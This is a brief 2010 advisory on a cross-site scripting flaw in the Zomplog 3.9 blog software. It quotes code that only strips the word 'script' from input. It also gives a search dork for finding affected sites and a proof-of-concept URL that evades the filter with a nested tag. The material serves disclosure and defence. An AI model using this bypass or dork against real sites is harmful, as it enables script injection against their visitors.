Zomplog 3.9 XSS Vulnerability
Posted on 10 April 2010
============================= Zomplog 3.9 XSS Vulnerability ============================= ############################################################################ #Title: Zomplog 3.9 XSS #Vendor: http://www.zomp.nl #Dork: "Powered by Zomplog" ############################################################################ #AUTHOR: ITSecTeam #Email: Bug@ITSecTeam.com #Website: http://www.itsecteam.com #Forum : http://forum.ITSecTeam.com #Original Advisory: http://itsecteam.com/en/vulnerabilities/vulnerability42.htm #Thanks: r3dm0v3, Pejvak, am!rkh@n ############################################################################ #DESCRIPTION (by vendor):################################################### There are many great weblog systems around, but they all require technical knowledge from their users. Zomplog is different: it let's you focus on content instead of code. #BUG:####################################################################### file index.php 10: // some general xxs protection 11: $_GET['search'] = str_replace('script', '', $_GET['search']); 12: $_GET['username'] = str_replace('script', '', $_GET['username']); Code just removes script keyword that leaves file vulnerable to xss. #POC:####################################################################### http://www.site.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt> # Inj3ct0r.com [2010-04-10]
